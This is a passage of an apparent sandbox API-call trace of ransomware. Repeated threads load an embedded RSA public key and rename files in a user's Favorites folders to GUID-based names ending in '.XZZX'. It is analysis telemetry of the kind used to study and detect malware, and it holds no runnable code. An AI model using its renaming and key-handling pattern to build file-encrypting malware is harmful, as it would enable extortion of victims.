Websites\\2CDB4D6C1374F2D15A5E52941795D719.XZZX") returned 100 [0111.141] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 335 os_tid = 0x83c [0111.303] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.303] lstrcpyW (in: lpString1=0x420f460, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0111.303] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.303] SetErrorMode (uMode=0x1) returned 0x1 [0111.303] lstrcpyW (in: lpString1=0x420f860, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0111.303] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x156864cf, Data2=0xc899, Data3=0x404b, Data4=([0]=0x90, [1]=0x5d, [2]=0x3e, [3]=0x49, [4]=0x62, [5]=0x12, [6]=0x39, [7]=0x7f))) returned 0x0 [0111.303] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\13771DB6235C0ADD78BD03922773EF25.XZZX") returned 94 [0111.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.303] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\5A25F7B7326104D3156864CF3681E91B.XZZX") returned 94 [0111.303] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 336 os_tid = 0x840 [0111.454] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.454] lstrcpyW (in: lpString1=0x420f460, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0111.454] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.454] SetErrorMode (uMode=0x1) returned 0x1 [0111.454] lstrcpyW (in: lpString1=0x420f860, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0111.454] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x5a39c6a3, Data2=0x1d36, Data3=0x4c6f, Data4=([0]=0xb5, [1]=0x61, [2]=0x73, [3]=0xd1, [4]=0x57, [5]=0x0, [6]=0x4d, [7]=0xfc))) returned 0x0 [0111.454] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\583CA788134302604AF8FA2E175AE6A8.XZZX") returned 94 [0111.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.454] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\93B05D6208B8B26A5A39C6A30CD996B2.XZZX") returned 94 [0111.454] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 337 os_tid = 0x844 [0111.609] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.609] lstrcpyW (in: lpString1=0x420f460, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0111.609] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.609] SetErrorMode (uMode=0x1) returned 0x1 [0111.609] lstrcpyW (in: lpString1=0x420f860, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0111.609] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x6d363765, Data2=0x7078, Data3=0x43d0, Data4=([0]=0xab, [1]=0xa0, [2]=0x82, [3]=0xf1, [4]=0x1d, [5]=0x3, [6]=0x47, [7]=0x48))) returned 0x0 [0111.609] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned 94 [0111.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.609] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\E9A627581DCAC9806D36376521EBADC8.XZZX") returned 94 [0111.609] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 338 os_tid = 0x848 [0111.765] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.765] lstrcpyW (in: lpString1=0x420f460, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0111.765] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.765] SetErrorMode (uMode=0x1) returned 0x1 [0111.765] lstrcpyW (in: lpString1=0x420f860, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0111.765] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xe2927313, Data2=0x9b8b, Data3=0x4bbc, Data4=([0]=0xaa, [1]=0x36, [2]=0xd8, [3]=0x9c, [4]=0x9b, [5]=0x41, [6]=0x83, [7]=0x84))) returned 0x0 [0111.765] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\880F5E93248AC126C0E08BB728B7A56E.XZZX") returned 94 [0111.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.765] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\B130FC512E03F314E29273133224D75C.XZZX") returned 94 [0111.765] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 339 os_tid = 0x84c [0111.921] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0111.921] lstrcpyW (in: lpString1=0x420f460, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0111.921] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0111.921] SetErrorMode (uMode=0x1) returned 0x1 [0111.921] lstrcpyW (in: lpString1=0x420f860, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0111.921] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xce2bda1e, Data2=0xe4c6, Data3=0x4b35, Data4=([0]=0x8d, [1]=0x4a, [2]=0x8d, [3]=0xb8, [4]=0x46, [5]=0x5, [6]=0xae, [7]=0x7b))) returned 0x0 [0111.921] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned 94 [0111.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0111.921] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\842D6B3443355EFECE2BDA1E47564346.XZZX") returned 94 [0111.922] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 340 os_tid = 0x850 [0112.077] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.077] lstrcpyW (in: lpString1=0x420f460, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0112.077] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0112.077] SetErrorMode (uMode=0x1) returned 0x1 [0112.077] lstrcpyW (in: lpString1=0x420f860, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0112.077] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf697286a, Data2=0x5a36, Data3=0x4407, Data4=([0]=0xba, [1]=0x1a, [2]=0xd9, [3]=0x60, [4]=0x57, [5]=0x34, [6]=0xc2, [7]=0xf0))) returned 0x0 [0112.077] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\94764F5B3C2DC73EAED48D494045AB86.XZZX") returned 94 [0112.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.077] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\2817CA5C17F8CF7AF697286A1C19B3C2.XZZX") returned 94 [0112.077] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 341 os_tid = 0x854 [0112.240] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.240] lstrcpyW (in: lpString1=0x420f460, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0112.240] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.240] SetErrorMode (uMode=0x1) returned 0x1 [0112.240] lstrcpyW (in: lpString1=0x420f860, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0112.240] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7922a19e, Data2=0x1cdd, Data3=0x45c9, Data4=([0]=0x91, [1]=0xdc, [2]=0x4f, [3]=0x39, [4]=0xda, [5]=0xb6, [6]=0x8a, [7]=0xb2))) returned 0x0 [0112.240] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned 94 [0112.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.240] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\5C92CD6607DE3A857922A19E0BFF1ECD.XZZX") returned 94 [0112.240] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 342 os_tid = 0x858 [0112.389] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0112.389] lstrcpyW (in: lpString1=0x420f460, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0112.389] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0112.389] SetErrorMode (uMode=0x1) returned 0x1 [0112.389] lstrcpyW (in: lpString1=0x420f860, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0112.389] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb0005c88, Data2=0x3882, Data3=0x4b7e, Data4=([0]=0xbe, [1]=0x91, [2]=0xa4, [3]=0xcd, [4]=0xec, [5]=0xad, [6]=0xc0, [7]=0x3b))) returned 0x0 [0112.389] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\A58916D017654CD0CF379F2B1B923118.XZZX") returned 94 [0112.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0112.389] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\746CBD1010A9E5FCB0005C8814CACA44.XZZX") returned 94 [0112.389] StrStrW (lpFirst="A58916D017654CD0CF379F2B1B923118.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 343 os_tid = 0x85c [0112.547] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 